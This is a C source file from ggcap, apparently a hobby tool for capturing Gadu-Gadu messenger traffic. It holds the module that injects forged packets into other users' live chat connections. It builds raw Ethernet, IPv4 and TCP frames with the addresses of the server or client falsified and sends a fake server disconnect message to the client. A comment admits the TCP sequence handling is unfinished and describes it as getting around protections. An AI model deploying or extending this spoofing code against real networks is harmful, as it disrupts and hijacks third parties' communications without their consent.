/*
    ggcap - spooftool.c
    Copyright (c) 2009 Arkadiusz Bokowy
*/

#include "ggcap.h"

// Spoof module input callback function (placed in main synchronous IO loop)
int spooftool_input_callback()
{
	int opt;

	opt = tolower(getchar());

	if(opt == '0'){ //cancel spooftool module (leave callback)
		printf("canceled spoofing\n\n");
		return 0;
	}

	// command parsing section
	if(sp_dt.spoof_type == SPOOFTOOL_S2C)
		switch(opt){ //commands for: data to client
		case 'd':
			printf("msg to client: server is closing connection\n\n");
			spooftools_disconnect_from_srv();
			return 0;
		}
	else //commands for: data to server
		switch(opt){
		case ' ': ;
		}

	return 1; //stay in spooftool callback on default
}

// Send to client disconnect message (server is closing connection)
void spooftools_disconnect_from_srv()
{
	struct gg_header gg_h;

	gg_h.type = GG_DISCONNECTING;
	gg_h.length = 0;

	spooftool_send_to_client((u_char *)&gg_h, sizeof(gg_h));
}

// Send data to GG client (from server). On error return -1.
int spooftool_send_to_client(const u_char *data, int len)
{
//FIXME: seq, ack i flags ..... jak to kurwa rozwiazac... (obejscie zabezpieczen)
	sp_dt.tcp = libnet_build_tcp(sp_dt.conn_info->srvprt, sp_dt.conn_info->cliprt,
			sp_dt.conn_info->tcp_seq + 6, 0x666, 0x18, 432, 0, 0,
			LIBNET_TCP_H + len, (uint8_t *)data, len, sp_dt.lnet, sp_dt.tcp);

	sp_dt.ipv4 = libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H + len,
			0, libnet_get_prand(LIBNET_PRu16), IP_DF, 58, IPPROTO_TCP, 0,
			sp_dt.conn_info->srvaddr, sp_dt.conn_info->cliaddr, NULL, 0,
			sp_dt.lnet, sp_dt.ipv4);

	sp_dt.ether = libnet_build_ethernet(sp_dt.conn_info->climac,
			sp_dt.conn_info->srvmac, ETHERTYPE_IP, NULL, 0, sp_dt.lnet, sp_dt.ether);

	if(sp_dt.tcp == -1 || sp_dt.ipv4 == -1 || sp_dt.ether == -1)
		return -1;

	return libnet_write(sp_dt.lnet);
}

// Send data to GG server (from client). On error return -1.
int spooftool_send_to_server(const u_char *data, int len)
{
//FIXME: same bug as in send_to_client (in TCP)
	sp_dt.tcp = libnet_build_tcp(sp_dt.conn_info->cliprt, sp_dt.conn_info->srvprt,
			sp_dt.conn_info->tcp_seq + 6, 0x666, 0x18, 432, 0, 0,
			LIBNET_TCP_H + len, (uint8_t *)data, len, sp_dt.lnet, sp_dt.tcp);

	sp_dt.ipv4 = libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H + len,
			0, libnet_get_prand(LIBNET_PRu16), IP_DF, 58, IPPROTO_TCP, 0,
			sp_dt.conn_info->cliaddr, sp_dt.conn_info->srvaddr, NULL, 0,
			sp_dt.lnet, sp_dt.ipv4);

	sp_dt.ether = libnet_build_ethernet(sp_dt.conn_info->srvmac,
			sp_dt.conn_info->climac, ETHERTYPE_IP, NULL, 0, sp_dt.lnet, sp_dt.ether);

	if(sp_dt.tcp == -1 || sp_dt.ipv4 == -1 || sp_dt.ether == -1)
		return -1;

	return libnet_write(sp_dt.lnet);
}

// Initialize spoof input callback (or just skip it)
int spooftool_input_init(int init_char)
{
	int conn_no;

	if(sp_dt.lnet == NULL){
		printf("Spoof module is disabled due to some error.\n\n");
		return 0;}

	if((conn_no = spooftool_get_connection_no()) != 0){
		// user cancel action handling
		if(conn_no == -1) printf("\n");}
	else
		printf("Connections database is empty (nothing to spoof).\n\n");

	// no connection or user canceled operation
	if(conn_no < 1) return 0;

	// get connection info struct
	sp_dt.conn_info = &g_array_index(gg_dt.cl2srv_db,
			struct client2server_info, conn_no - 1);

	// set direction of spoofing (client2server or server2client)
	if(init_char == 'c') sp_dt.spoof_type = SPOOFTOOL_S2C;
	else sp_dt.spoof_type = SPOOFTOOL_C2S;

	spooftool_print_initial_info();
	return 1;
}

// Print initial information to user (connection info and available options)
void spooftool_print_initial_info()
{
	char cliadr[20], srvadr[20];

	strcpy(cliadr, inet_ntoa(*((struct in_addr *)(&sp_dt.conn_info->cliaddr))));
	strcpy(srvadr, inet_ntoa(*((struct in_addr *)(&sp_dt.conn_info->srvaddr))));

	printf("Spoofing mode:     sending data to %s\n",
			sp_dt.spoof_type == SPOOFTOOL_S2C ? "client" : "server");
	printf("Connection info:   client: %s:%u | server: %s:%u\n",
			cliadr, sp_dt.conn_info->cliprt, srvadr, sp_dt.conn_info->srvprt);
	printf("GG client version: %.2x\n", sp_dt.conn_info->type);

	printf("\nAvailable commands:\n");
	if(sp_dt.spoof_type == SPOOFTOOL_S2C) //commands for: data to client
		printf("  d\tdisconnect signal from server\n"
"  0\tcancel spoofing\n\n");
	else //commands for: data to server
		printf("  0\tcancel spoofing\n\n");
}

// Get connection number to spoof. Return -1 on user cancel action.
int spooftool_get_connection_no()
{
	int connection;

	if(gg_dt.cl2srv_db->len < 2) return gg_dt.cl2srv_db->len;

	printf("Enter connection number which you want to spoof [1-%d or 0]: ",
			gg_dt.cl2srv_db->len);

	do{ //get connection no. from user (wait until correct input)
		connection = getchar() - '0';}
	while(connection < 0 || connection > gg_dt.cl2srv_db->len);

	printf("%d\n", connection);

	if(connection == 0) return -1;
	return connection;
}

void spooftool_clean_up()
{
	if(sp_dt.lnet != NULL) libnet_destroy(sp_dt.lnet);
}

void spooftool_initialize()
{
	char errbuf[LIBNET_ERRBUF_SIZE];

	// clear global structure
	bzero(&sp_dt, sizeof(sp_dt));

	// initialize libnet for raw packet construction
	if((sp_dt.lnet = libnet_init(LIBNET_LINK, gg_dt.iface, errbuf)) == NULL)
		fprintf(stderr, "warning: libnet initialization error (spoof module disabled)\n");
}
